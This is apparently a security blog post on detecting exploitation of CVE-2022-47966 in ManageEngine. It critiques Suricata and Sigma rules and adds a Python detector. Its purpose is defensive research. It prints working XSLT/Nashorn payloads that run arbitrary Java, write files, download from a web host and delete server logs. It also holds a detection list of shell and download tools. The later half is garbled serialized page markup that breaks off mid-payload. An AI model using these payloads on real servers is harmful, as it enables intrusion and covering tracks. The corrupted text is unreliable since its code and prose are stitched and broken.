alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT ManageEngine Unauthenticated RCE Attempt M1 (CVE-2022-47966)"; \
flow:to_server,established; \
http.method; content:"POST"; \
http.request_body; content:"|27|SAMLResponse|27|"; fast_pattern; \
content:"|3a|"; distance:0; within:5; \
content:"|27|"; base64_decode:offset 0, relative; \
base64_data; content:"|3a|getRuntime|28 29|"; \
content:"|3a|exec|28|"; \
reference:cve,2022-47966; \
classtype:attempted-admin; \
sid:2043335; rev:1; \
metadata:attack_target Server, created_at 2023_01_19, cve CVE_2022_47966, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2023_01_19; )
```

```
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT ManageEngine Unauthenticated RCE Attempt M2 (CVE-2022-47966)"; \
flow:to_server,established; \
http.method; content:"POST"; \
http.request_body; content:"|22|SAMLResponse|22|"; fast_pattern; \
content:"|3a|"; distance:0; within:5; \
content:"|22|"; \
base64_decode:offset 0, relative; \
base64_data; content:"|3a|getRuntime|28 29|"; \
content:"|3a|exec|28|"; \
reference:cve,2022-47966; \
classtype:attempted-admin; \
sid:2043336; \
rev:1; \
metadata:attack_target Server, created_at 2023_01_19, cve CVE_2022_47966, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2023_01_19;)
```

Ignoring the fact that these rules will never trigger on any exploit written for CVE-2022-47966, you can see that they were modeled after the Horizon3.ai exploit. The rules require an HTTP POST request and they look for `getRuntime()` and `exec()` in the base64 encoded XML payload. Neither of these things is actually a requirement to exploit CVE-2022-47966.

Exploitation doesn’t require an HTTP POST. The PCAP screenshot below shows an exploit with the payload in an HTTP GET request resulting in a reverse shell.

![GET Payload](/blog/cve-2022-47966-payload/get_reverse_shell.png)

Nor does CVE-2022-47966 need to use `getRuntime().exec()`. In fact, it’s probably best not to. As stated earlier, an XSLT transform can execute arbitrary Java. There isn’t any need to invoke external programs like `cmd.exe` and `powershell.exe`. Java has most of what an attacker needs built-in. Additionally, `java.exe` invoking external programs is widely treated as potentially suspicious behavior and is likely to get an attacker caught.
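Both of the gaps just described, the GET request and a transform that never calls `getRuntime()`, are easy to see in code. The following Python is an added example (not the post's or VulnCheck's code): it pulls `SAMLResponse` from either a GET query string or a POST form body, base64-decodes it, and applies two checks side by side: the PoC-specific `getRuntime()`/`exec(` idiom that the ET signatures look for, and a generic check for any XSLT transform whose stylesheet binds an `xmlns` prefix to a Java class through Xalan's `http://xml.apache.org/xalan/java/` namespace. The SAML envelope, the `/saml/acs` path and both payloads are constructed for the example.

```python
"""Inspect a SAMLResponse for XSLT-transform abuse (added example, not VulnCheck's code)."""
import base64
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

XSLT_ALGO = "http://www.w3.org/TR/1999/REC-xslt-19991116"
# Xalan binds an xmlns prefix to a Java class when the namespace URI starts with this path
XALAN_JAVA_NS = re.compile(r'xmlns:\w+="http://xml\.apache\.org/xalan/java/([\w.]+)"')

# Constructed payloads: a PoC-style getRuntime().exec() transform and a Nashorn transform
POC_XML = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
 <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:Reference>
  <ds:Transforms>
   <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
      xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
     <xsl:template match="/"><xsl:value-of select="rt:exec(rt:getRuntime(),'whoami')"/></xsl:template>
    </xsl:stylesheet>
   </ds:Transform>
  </ds:Transforms>
 </ds:Reference></ds:SignedInfo></ds:Signature>
</samlp:Response>"""

NASHORN_XML = POC_XML.replace(
    'xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"',
    'xmlns:sem="http://xml.apache.org/xalan/java/javax.script.ScriptEngineManager"\n'
    '      xmlns:se="http://xml.apache.org/xalan/java/javax.script.ScriptEngine"',
).replace(
    "rt:exec(rt:getRuntime(),'whoami')",
    "se:eval(sem:getEngineByName(sem:new(),'nashorn'),'1+1')",
)


def extract_saml_response(request_line: str, body: str = "") -> Optional[str]:
    """Take SAMLResponse from the query string of a GET or the form body of a POST."""
    method, target, _version = request_line.split(" ", 2)
    params = body if method == "POST" else urlsplit(target).query
    values = parse_qs(params).get("SAMLResponse")
    return values[0] if values else None


def poc_signature(xml_text: str) -> bool:
    """What the ET rules look for after base64-decoding: the PoC's getRuntime()/exec( idiom."""
    return ":getRuntime()" in xml_text and ":exec(" in xml_text


def xslt_java_bindings(xml_text: str) -> List[str]:
    """Java classes bound via xmlns in a document that also declares the XSLT transform algorithm."""
    if XSLT_ALGO not in xml_text:
        return []
    return XALAN_JAVA_NS.findall(xml_text)


def analyze(request_line: str, body: str = "") -> Dict[str, object]:
    """Run both checks on one request; works the same for GET and POST."""
    encoded = extract_saml_response(request_line, body)
    if encoded is None:
        return {"poc_match": False, "java_classes": []}
    xml_text = base64.b64decode(encoded).decode("utf-8", errors="replace")
    return {"poc_match": poc_signature(xml_text), "java_classes": xslt_java_bindings(xml_text)}


def build_requests(xml_text: str) -> Tuple[Tuple[str, str], Tuple[str, str]]:
    """Constructed traffic: the same payload as a POST body and as a GET query string (/saml/acs is a placeholder)."""
    encoded = urlencode({"SAMLResponse": base64.b64encode(xml_text.encode()).decode()})
    return ("POST /saml/acs HTTP/1.1", encoded), ("GET /saml/acs?" + encoded + " HTTP/1.1", "")
```

The PoC payload trips both checks whether it arrives by GET or POST; the Nashorn payload trips only the namespace check, which is the point: keying on `xalan/java/` bindings inside an XSLT `ds:Transform` survives a change of Java class, while keying on `getRuntime()` does not. A legitimate SAML signature has no business carrying an XSLT transform at all, so the generic check is also low-noise.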
For example, the [Sigma rule](https://github.com/SigmaHQ/sigma/blob/6c153bff3f3b5bc7f0edefe430b2a6f903fd98b2/rules/windows/process_creation/proc_creation_win_susp_manageengine_pattern.yml) for CVE-2022-47966 is written to detect this exact activity:

```yaml
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|contains|all:
            - '\ManageEngine\ServiceDesk\'
            - '\java.exe'
        Image|endswith:
            - '\powershell.exe'
            - '\sh.exe'
            - '\bash.exe'
            - '\pwsh.exe'
            - '\schtasks.exe'
            - '\certutil.exe'
            - '\whoami.exe'  # Often used in POCs
            - '\bitsadmin.exe'
            - '\wscript.exe'
            - '\cscript.exe'
            - '\scrcons.exe'
            - '\wmic.exe'
            - '\mshta.exe'
            - '\forfiles.exe'
            - '\mftrace.exe'
            - '\AppVLP.exe'
            - '\curl.exe'
            - '\notepad.exe'  # Often used in POCs
            - '\systeminfo.exe'
            - '\net.exe'
            - '\net1.exe'
            - '\reg.exe'
            - '\query.exe'
```

This is a simple and effective detection, and it should work against the Metasploit [module](https://github.com/rapid7/metasploit-framework/blob/a5ba1245c224a4be1dc97b3892e6d51dabbeb4f8/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb#L60) developed for ManageEngine ServiceDesk Plus. That’s because the module uses Horizon3.ai’s `getRuntime().exec()` transform to invoke PowerShell (see `powershell.exe` in the rule above). However, the Sigma rule *won’t* work against an attacker that chooses to stay in memory.

## Memory Resident Payload

There are numerous ways for an attacker to go about abusing XSLT transforms to stay in memory, but the most flexible way (in my opinion) is to just invoke the Nashorn JavaScript engine. That transform looks like this:

```xml
<ds:Transforms>
    <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
    <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
     <xsl:stylesheet version="1.0"
         xmlns:sem="http://xml.apache.org/xalan/java/javax.script.ScriptEngineManager"
         xmlns:se="http://xml.apache.org/xalan/java/javax.script.ScriptEngine"
         xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
         <xsl:template match="/">
             <xsl:variable name="engineobject" select="sem:new()"/>
             <xsl:variable name="jsobject" select="sem:getEngineByName($engineobject,'nashorn')"/>
             <xsl:variable name="out" select="se:eval($jsobject,'INSERT ARBITRARY CODE HERE')"/>
             <xsl:value-of select="$out"/>
         </xsl:template>
     </xsl:stylesheet>
    </ds:Transform>
</ds:Transforms>
```

Using an XSLT transform to invoke Nashorn allows an attacker to do almost anything they’d want from within the original ManageEngine `java.exe` process. The attacker doesn’t need to invoke external programs because Java, however painful it may be, has a deep, feature-rich standard library that is largely available to the Nashorn engine. One caveat: Nashorn ships with JDK 8 through 14 and was removed from the JDK in Java 15, so this particular engine is only present when the runtime bundled with the product is older than that; on a newer JDK `getEngineByName('nashorn')` returns null and the transform has to reach for a different class.
",[886,110100,82664],{},". The attacker doesn’t need to invoke external programs because Java, however painful it may be, has a deep feature-rich standard library that is largely available to the Nashorn engine.",[18,110103,110104],{},"Need to write a file? No problem.",[1354,110106,110108],{"className":56326,"code":110107,"language":56328,"meta":219,"style":219},"\u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116\">\n    \u003Cxsl:stylesheet version=\"1.0\"\n     xmlns:sem=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngineManager\"\n     xmlns:se=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngine\"\n     xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\">\n     \u003Cxsl:template match=\"\u002F\">\n         \u003Cxsl:variable name=\"engineobject\" select=\"sem:new()\"\u002F>\n         \u003Cxsl:variable name=\"jsobject\" select=\"sem:getEngineByName($engineobject,'nashorn')\"\u002F>\n         \u003Cxsl:variable name=\"out\" select=\"se:eval($jsobject,'var FileWriter = Java.type(&quot;java.io.FileWriter&quot;);\n          var rootPath = Java.type(&quot;java.lang.System&quot;).getenv(&quot;SystemDrive&quot;);\n          rootPath += &quot;\u002Fvulncheck.txt&quot;;\n          var fwObj = new FileWriter(rootPath);\n          fwObj.write(&quot;hello world!&quot;);\n          fwObj.close();')\"\u002F>\n         \u003Cxsl:value-of select=\"$out\"\u002F>\n     \u003C\u002Fxsl:template>\n    
\u003C\u002Fxsl:stylesheet>\n\u003C\u002Fds:Transform>\n",[886,110109,110110,110132,110152,110169,110185,110203,110225,110257,110289,110335,110375,110397,110402,110423,110432,110454,110466,110478],{"__ignoreMap":219},[1373,110111,110112,110114,110116,110118,110120,110122,110124,110126,110128,110130],{"class":1375,"line":1376},[1373,110113,11852],{"class":1383},[1373,110115,109306],{"class":6300},[1373,110117,4606],{"class":109775},[1373,110119,109324],{"class":6300},[1373,110121,109327],{"class":8252},[1373,110123,5417],{"class":1383},[1373,110125,183],{"class":1387},[1373,110127,109357],{"class":1391},[1373,110129,183],{"class":1387},[1373,110131,6765],{"class":1383},[1373,110133,110134,110136,110138,110140,110142,110144,110146,110148,110150],{"class":1375,"line":220},[1373,110135,8246],{"class":1383},[1373,110137,109368],{"class":6300},[1373,110139,4606],{"class":109775},[1373,110141,49025],{"class":6300},[1373,110143,45880],{"class":8252},[1373,110145,5417],{"class":1383},[1373,110147,183],{"class":1387},[1373,110149,84878],{"class":1391},[1373,110151,19057],{"class":1387},[1373,110153,110154,110157,110159,110161,110163,110165,110167],{"class":1375,"line":1266},[1373,110155,110156],{"class":8252},"     
xmlns",[1373,110158,4606],{"class":51986},[1373,110160,109852],{"class":8252},[1373,110162,5417],{"class":1383},[1373,110164,183],{"class":1387},[1373,110166,109859],{"class":1391},[1373,110168,19057],{"class":1387},[1373,110170,110171,110173,110175,110177,110179,110181,110183],{"class":1375,"line":1852},[1373,110172,110156],{"class":8252},[1373,110174,4606],{"class":51986},[1373,110176,109870],{"class":8252},[1373,110178,5417],{"class":1383},[1373,110180,183],{"class":1387},[1373,110182,109877],{"class":1391},[1373,110184,19057],{"class":1387},[1373,110186,110187,110189,110191,110193,110195,110197,110199,110201],{"class":1375,"line":4692},[1373,110188,110156],{"class":8252},[1373,110190,4606],{"class":51986},[1373,110192,109368],{"class":8252},[1373,110194,5417],{"class":1383},[1373,110196,183],{"class":1387},[1373,110198,109433],{"class":1391},[1373,110200,183],{"class":1387},[1373,110202,6765],{"class":1383},[1373,110204,110205,110207,110209,110211,110213,110215,110217,110219,110221,110223],{"class":1375,"line":4724},[1373,110206,85290],{"class":1383},[1373,110208,109368],{"class":6300},[1373,110210,4606],{"class":109775},[1373,110212,30296],{"class":6300},[1373,110214,109910],{"class":8252},[1373,110216,5417],{"class":1383},[1373,110218,183],{"class":1387},[1373,110220,2180],{"class":1391},[1373,110222,183],{"class":1387},[1373,110224,6765],{"class":1383},[1373,110226,110227,110229,110231,110233,110235,110237,110239,110241,110243,110245,110247,110249,110251,110253,110255],{"class":1375,"line":4756},[1373,110228,109442],{"class":1383},[1373,110230,109368],{"class":6300},[1373,110232,4606],{"class":109775},[1373,110234,109931],{"class":6300},[1373,110236,46496],{"class":8252},[1373,110238,5417],{"class":1383},[1373,110240,183],{"class":1387},[1373,110242,109940],{"class":1391},[1373,110244,183],{"class":1387},[1373,110246,109483],{"class":8252},[1373,110248,5417],{"class":1383},[1373,110250,183],{"class":1387},[1373,110252,109951],{"class":1391},[1373,110254,183],
{"class":1387},[1373,110256,85355],{"class":1383},[1373,110258,110259,110261,110263,110265,110267,110269,110271,110273,110275,110277,110279,110281,110283,110285,110287],{"class":1375,"line":4768},[1373,110260,109442],{"class":1383},[1373,110262,109368],{"class":6300},[1373,110264,4606],{"class":109775},[1373,110266,109931],{"class":6300},[1373,110268,46496],{"class":8252},[1373,110270,5417],{"class":1383},[1373,110272,183],{"class":1387},[1373,110274,109974],{"class":1391},[1373,110276,183],{"class":1387},[1373,110278,109483],{"class":8252},[1373,110280,5417],{"class":1383},[1373,110282,183],{"class":1387},[1373,110284,109985],{"class":1391},[1373,110286,183],{"class":1387},[1373,110288,85355],{"class":1383},[1373,110290,110291,110293,110295,110297,110299,110301,110303,110305,110307,110309,110311,110313,110315,110318,110320,110322,110324,110327,110329,110331,110333],{"class":1375,"line":4792},[1373,110292,109442],{"class":1383},[1373,110294,109368],{"class":6300},[1373,110296,4606],{"class":109775},[1373,110298,109931],{"class":6300},[1373,110300,46496],{"class":8252},[1373,110302,5417],{"class":1383},[1373,110304,183],{"class":1387},[1373,110306,110008],{"class":1391},[1373,110308,183],{"class":1387},[1373,110310,109483],{"class":8252},[1373,110312,5417],{"class":1383},[1373,110314,183],{"class":1387},[1373,110316,110317],{"class":1391},"se:eval($jsobject,'var FileWriter = Java.type(",[1373,110319,7218],{"class":7054},[1373,110321,85318],{"class":2209},[1373,110323,39663],{"class":7054},[1373,110325,110326],{"class":1391},"java.io.FileWriter",[1373,110328,7218],{"class":7054},[1373,110330,85318],{"class":2209},[1373,110332,39663],{"class":7054},[1373,110334,4680],{"class":1391},[1373,110336,110337,110340,110342,110344,110346,110349,110351,110353,110355,110358,110360,110362,110364,110367,110369,110371,110373],{"class":1375,"line":4798},[1373,110338,110339],{"class":1391},"          var rootPath = 
Java.type(",[1373,110341,7218],{"class":7054},[1373,110343,85318],{"class":2209},[1373,110345,39663],{"class":7054},[1373,110347,110348],{"class":1391},"java.lang.System",[1373,110350,7218],{"class":7054},[1373,110352,85318],{"class":2209},[1373,110354,39663],{"class":7054},[1373,110356,110357],{"class":1391},").getenv(",[1373,110359,7218],{"class":7054},[1373,110361,85318],{"class":2209},[1373,110363,39663],{"class":7054},[1373,110365,110366],{"class":1391},"SystemDrive",[1373,110368,7218],{"class":7054},[1373,110370,85318],{"class":2209},[1373,110372,39663],{"class":7054},[1373,110374,4680],{"class":1391},[1373,110376,110377,110380,110382,110384,110386,110389,110391,110393,110395],{"class":1375,"line":4806},[1373,110378,110379],{"class":1391},"          rootPath += ",[1373,110381,7218],{"class":7054},[1373,110383,85318],{"class":2209},[1373,110385,39663],{"class":7054},[1373,110387,110388],{"class":1391},"\u002Fvulncheck.txt",[1373,110390,7218],{"class":7054},[1373,110392,85318],{"class":2209},[1373,110394,39663],{"class":7054},[1373,110396,4912],{"class":1391},[1373,110398,110399],{"class":1375,"line":4817},[1373,110400,110401],{"class":1391},"          var fwObj = new FileWriter(rootPath);\n",[1373,110403,110404,110407,110409,110411,110413,110415,110417,110419,110421],{"class":1375,"line":4825},[1373,110405,110406],{"class":1391},"          fwObj.write(",[1373,110408,7218],{"class":7054},[1373,110410,85318],{"class":2209},[1373,110412,39663],{"class":7054},[1373,110414,82565],{"class":1391},[1373,110416,7218],{"class":7054},[1373,110418,85318],{"class":2209},[1373,110420,39663],{"class":7054},[1373,110422,4680],{"class":1391},[1373,110424,110425,110428,110430],{"class":1375,"line":4835},[1373,110426,110427],{"class":1391},"          
fwObj.close();')",[1373,110429,183],{"class":1387},[1373,110431,85355],{"class":1383},[1373,110433,110434,110436,110438,110440,110442,110444,110446,110448,110450,110452],{"class":1375,"line":4843},[1373,110435,109442],{"class":1383},[1373,110437,109368],{"class":6300},[1373,110439,4606],{"class":109775},[1373,110441,110034],{"class":6300},[1373,110443,109483],{"class":8252},[1373,110445,5417],{"class":1383},[1373,110447,183],{"class":1387},[1373,110449,110043],{"class":1391},[1373,110451,183],{"class":1387},[1373,110453,85355],{"class":1383},[1373,110455,110456,110458,110460,110462,110464],{"class":1375,"line":4849},[1373,110457,109601],{"class":1383},[1373,110459,109368],{"class":6300},[1373,110461,4606],{"class":109775},[1373,110463,30296],{"class":6300},[1373,110465,6765],{"class":1383},[1373,110467,110468,110470,110472,110474,110476],{"class":1375,"line":4877},[1373,110469,56557],{"class":1383},[1373,110471,109368],{"class":6300},[1373,110473,4606],{"class":109775},[1373,110475,49025],{"class":6300},[1373,110477,6765],{"class":1383},[1373,110479,110480,110482,110484,110486,110488],{"class":1375,"line":4915},[1373,110481,46627],{"class":1383},[1373,110483,109306],{"class":6300},[1373,110485,4606],{"class":109775},[1373,110487,109324],{"class":6300},[1373,110489,6765],{"class":1383},[18,110491,110492,110493,59],{},"Need to download something from the internet? 
Eat your heart out, ",[886,110494,84820],{},[1354,110496,110498],{"className":56326,"code":110497,"language":56328,"meta":219,"style":219},"\u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116\">\n    \u003Cxsl:stylesheet version=\"1.0\"\n     xmlns:sem=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngineManager\"\n     xmlns:se=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngine\"\n     xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\">\n     \u003Cxsl:template match=\"\u002F\">\n         \u003Cxsl:variable name=\"engineobject\" select=\"sem:new()\"\u002F>\n         \u003Cxsl:variable name=\"jsobject\" select=\"sem:getEngineByName($engineobject,'nashorn')\"\u002F>\n         \u003Cxsl:variable name=\"out\" select=\"se:eval($jsobject,'var URL = Java.type(&quot;java.net.URL&quot;);\n         var url = new URL(&quot;https&quot; + String.fromCharCode(58) + &quot;\u002F\u002Fwww.google.com:\u002F&quot;);\n         var is = url.openStream();\n         var localPath = Java.type(&quot;java.nio.file.Paths&quot;).get(Java.type(&quot;java.lang.System&quot;).getenv(&quot;SystemDrive&quot;) + &quot;\u002Fvulncheck.txt&quot;);\n         Java.type(&quot;java.nio.file.Files&quot;).copy(is, localPath);')\"\u002F>\n         \u003Cxsl:value-of select=\"$out\"\u002F>\n     \u003C\u002Fxsl:template>\n    
\u003C\u002Fxsl:stylesheet>\n\u003C\u002Fds:Transform>\n",[886,110499,110500,110522,110542,110558,110574,110592,110614,110646,110678,110724,110764,110769,110841,110868,110890,110902,110914],{"__ignoreMap":219},[1373,110501,110502,110504,110506,110508,110510,110512,110514,110516,110518,110520],{"class":1375,"line":1376},[1373,110503,11852],{"class":1383},[1373,110505,109306],{"class":6300},[1373,110507,4606],{"class":109775},[1373,110509,109324],{"class":6300},[1373,110511,109327],{"class":8252},[1373,110513,5417],{"class":1383},[1373,110515,183],{"class":1387},[1373,110517,109357],{"class":1391},[1373,110519,183],{"class":1387},[1373,110521,6765],{"class":1383},[1373,110523,110524,110526,110528,110530,110532,110534,110536,110538,110540],{"class":1375,"line":220},[1373,110525,8246],{"class":1383},[1373,110527,109368],{"class":6300},[1373,110529,4606],{"class":109775},[1373,110531,49025],{"class":6300},[1373,110533,45880],{"class":8252},[1373,110535,5417],{"class":1383},[1373,110537,183],{"class":1387},[1373,110539,84878],{"class":1391},[1373,110541,19057],{"class":1387},[1373,110543,110544,110546,110548,110550,110552,110554,110556],{"class":1375,"line":1266},[1373,110545,110156],{"class":8252},[1373,110547,4606],{"class":51986},[1373,110549,109852],{"class":8252},[1373,110551,5417],{"class":1383},[1373,110553,183],{"class":1387},[1373,110555,109859],{"class":1391},[1373,110557,19057],{"class":1387},[1373,110559,110560,110562,110564,110566,110568,110570,110572],{"class":1375,"line":1852},[1373,110561,110156],{"class":8252},[1373,110563,4606],{"class":51986},[1373,110565,109870],{"class":8252},[1373,110567,5417],{"class":1383},[1373,110569,183],{"class":1387},[1373,110571,109877],{"class":1391},[1373,110573,19057],{"class":1387},[1373,110575,110576,110578,110580,110582,110584,110586,110588,110590],{"class":1375,"line":4692},[1373,110577,110156],{"class":8252},[1373,110579,4606],{"class":51986},[1373,110581,109368],{"class":8252},[1373,110583,5417],{"class":1383},[1373,
110585,183],{"class":1387},[1373,110587,109433],{"class":1391},[1373,110589,183],{"class":1387},[1373,110591,6765],{"class":1383},[1373,110593,110594,110596,110598,110600,110602,110604,110606,110608,110610,110612],{"class":1375,"line":4724},[1373,110595,85290],{"class":1383},[1373,110597,109368],{"class":6300},[1373,110599,4606],{"class":109775},[1373,110601,30296],{"class":6300},[1373,110603,109910],{"class":8252},[1373,110605,5417],{"class":1383},[1373,110607,183],{"class":1387},[1373,110609,2180],{"class":1391},[1373,110611,183],{"class":1387},[1373,110613,6765],{"class":1383},[1373,110615,110616,110618,110620,110622,110624,110626,110628,110630,110632,110634,110636,110638,110640,110642,110644],{"class":1375,"line":4756},[1373,110617,109442],{"class":1383},[1373,110619,109368],{"class":6300},[1373,110621,4606],{"class":109775},[1373,110623,109931],{"class":6300},[1373,110625,46496],{"class":8252},[1373,110627,5417],{"class":1383},[1373,110629,183],{"class":1387},[1373,110631,109940],{"class":1391},[1373,110633,183],{"class":1387},[1373,110635,109483],{"class":8252},[1373,110637,5417],{"class":1383},[1373,110639,183],{"class":1387},[1373,110641,109951],{"class":1391},[1373,110643,183],{"class":1387},[1373,110645,85355],{"class":1383},[1373,110647,110648,110650,110652,110654,110656,110658,110660,110662,110664,110666,110668,110670,110672,110674,110676],{"class":1375,"line":4768},[1373,110649,109442],{"class":1383},[1373,110651,109368],{"class":6300},[1373,110653,4606],{"class":109775},[1373,110655,109931],{"class":6300},[1373,110657,46496],{"class":8252},[1373,110659,5417],{"class":1383},[1373,110661,183],{"class":1387},[1373,110663,109974],{"class":1391},[1373,110665,183],{"class":1387},[1373,110667,109483],{"class":8252},[1373,110669,5417],{"class":1383},[1373,110671,183],{"class":1387},[1373,110673,109985],{"class":1391},[1373,110675,183],{"class":1387},[1373,110677,85355],{"class":1383},[1373,110679,110680,110682,110684,110686,110688,110690,110692,110694,110696,1
10698,110700,110702,110704,110707,110709,110711,110713,110716,110718,110720,110722],{"class":1375,"line":4792},[1373,110681,109442],{"class":1383},[1373,110683,109368],{"class":6300},[1373,110685,4606],{"class":109775},[1373,110687,109931],{"class":6300},[1373,110689,46496],{"class":8252},[1373,110691,5417],{"class":1383},[1373,110693,183],{"class":1387},[1373,110695,110008],{"class":1391},[1373,110697,183],{"class":1387},[1373,110699,109483],{"class":8252},[1373,110701,5417],{"class":1383},[1373,110703,183],{"class":1387},[1373,110705,110706],{"class":1391},"se:eval($jsobject,'var URL = Java.type(",[1373,110708,7218],{"class":7054},[1373,110710,85318],{"class":2209},[1373,110712,39663],{"class":7054},[1373,110714,110715],{"class":1391},"java.net.URL",[1373,110717,7218],{"class":7054},[1373,110719,85318],{"class":2209},[1373,110721,39663],{"class":7054},[1373,110723,4680],{"class":1391},[1373,110725,110726,110729,110731,110733,110735,110738,110740,110742,110744,110747,110749,110751,110753,110756,110758,110760,110762],{"class":1375,"line":4798},[1373,110727,110728],{"class":1391},"         var url = new URL(",[1373,110730,7218],{"class":7054},[1373,110732,85318],{"class":2209},[1373,110734,39663],{"class":7054},[1373,110736,110737],{"class":1391},"https",[1373,110739,7218],{"class":7054},[1373,110741,85318],{"class":2209},[1373,110743,39663],{"class":7054},[1373,110745,110746],{"class":1391}," + String.fromCharCode(58) + ",[1373,110748,7218],{"class":7054},[1373,110750,85318],{"class":2209},[1373,110752,39663],{"class":7054},[1373,110754,110755],{"class":1391},"\u002F\u002Fwww.google.com:\u002F",[1373,110757,7218],{"class":7054},[1373,110759,85318],{"class":2209},[1373,110761,39663],{"class":7054},[1373,110763,4680],{"class":1391},[1373,110765,110766],{"class":1375,"line":4806},[1373,110767,110768],{"class":1391},"         var is = 
url.openStream();\n",[1373,110770,110771,110774,110776,110778,110780,110783,110785,110787,110789,110792,110794,110796,110798,110800,110802,110804,110806,110808,110810,110812,110814,110816,110818,110820,110822,110825,110827,110829,110831,110833,110835,110837,110839],{"class":1375,"line":4817},[1373,110772,110773],{"class":1391},"         var localPath = Java.type(",[1373,110775,7218],{"class":7054},[1373,110777,85318],{"class":2209},[1373,110779,39663],{"class":7054},[1373,110781,110782],{"class":1391},"java.nio.file.Paths",[1373,110784,7218],{"class":7054},[1373,110786,85318],{"class":2209},[1373,110788,39663],{"class":7054},[1373,110790,110791],{"class":1391},").get(Java.type(",[1373,110793,7218],{"class":7054},[1373,110795,85318],{"class":2209},[1373,110797,39663],{"class":7054},[1373,110799,110348],{"class":1391},[1373,110801,7218],{"class":7054},[1373,110803,85318],{"class":2209},[1373,110805,39663],{"class":7054},[1373,110807,110357],{"class":1391},[1373,110809,7218],{"class":7054},[1373,110811,85318],{"class":2209},[1373,110813,39663],{"class":7054},[1373,110815,110366],{"class":1391},[1373,110817,7218],{"class":7054},[1373,110819,85318],{"class":2209},[1373,110821,39663],{"class":7054},[1373,110823,110824],{"class":1391},") + ",[1373,110826,7218],{"class":7054},[1373,110828,85318],{"class":2209},[1373,110830,39663],{"class":7054},[1373,110832,110388],{"class":1391},[1373,110834,7218],{"class":7054},[1373,110836,85318],{"class":2209},[1373,110838,39663],{"class":7054},[1373,110840,4680],{"class":1391},[1373,110842,110843,110846,110848,110850,110852,110855,110857,110859,110861,110864,110866],{"class":1375,"line":4825},[1373,110844,110845],{"class":1391},"         
Java.type(",[1373,110847,7218],{"class":7054},[1373,110849,85318],{"class":2209},[1373,110851,39663],{"class":7054},[1373,110853,110854],{"class":1391},"java.nio.file.Files",[1373,110856,7218],{"class":7054},[1373,110858,85318],{"class":2209},[1373,110860,39663],{"class":7054},[1373,110862,110863],{"class":1391},").copy(is, localPath);')",[1373,110865,183],{"class":1387},[1373,110867,85355],{"class":1383},[1373,110869,110870,110872,110874,110876,110878,110880,110882,110884,110886,110888],{"class":1375,"line":4835},[1373,110871,109442],{"class":1383},[1373,110873,109368],{"class":6300},[1373,110875,4606],{"class":109775},[1373,110877,110034],{"class":6300},[1373,110879,109483],{"class":8252},[1373,110881,5417],{"class":1383},[1373,110883,183],{"class":1387},[1373,110885,110043],{"class":1391},[1373,110887,183],{"class":1387},[1373,110889,85355],{"class":1383},[1373,110891,110892,110894,110896,110898,110900],{"class":1375,"line":4843},[1373,110893,109601],{"class":1383},[1373,110895,109368],{"class":6300},[1373,110897,4606],{"class":109775},[1373,110899,30296],{"class":6300},[1373,110901,6765],{"class":1383},[1373,110903,110904,110906,110908,110910,110912],{"class":1375,"line":4849},[1373,110905,56557],{"class":1383},[1373,110907,109368],{"class":6300},[1373,110909,4606],{"class":109775},[1373,110911,49025],{"class":6300},[1373,110913,6765],{"class":1383},[1373,110915,110916,110918,110920,110922,110924],{"class":1375,"line":4877},[1373,110917,46627],{"class":1383},[1373,110919,109306],{"class":6300},[1373,110921,4606],{"class":109775},[1373,110923,109324],{"class":6300},[1373,110925,6765],{"class":1383},[18,110927,110928],{},"Need to delete a file? 
You can delete ‘em all if you want!",[1354,110930,110932],{"className":56326,"code":110931,"language":56328,"meta":219,"style":219},"\u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116\">\n    \u003Cxsl:stylesheet version=\"1.0\"\n     xmlns:sem=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngineManager\"\n     xmlns:se=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngine\"\n     xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\">\n     \u003Cxsl:template match=\"\u002F\">\n         \u003Cxsl:variable name=\"engineobject\" select=\"sem:new()\"\u002F>\n         \u003Cxsl:variable name=\"jsobject\" select=\"sem:getEngineByName($engineobject,'nashorn')\"\u002F>\n         \u003Cxsl:variable name=\"out\" select=\"se:eval($jsobject,'var File = Java.type(&quot;java.io.File&quot;);\n     var log = new File(&quot;..\u002Flogs\u002Fserverout1.txt&quot;);\n     log.delete();')\"\u002F>\n         \u003Cxsl:value-of select=\"$out\"\u002F>\n     \u003C\u002Fxsl:template>\n    
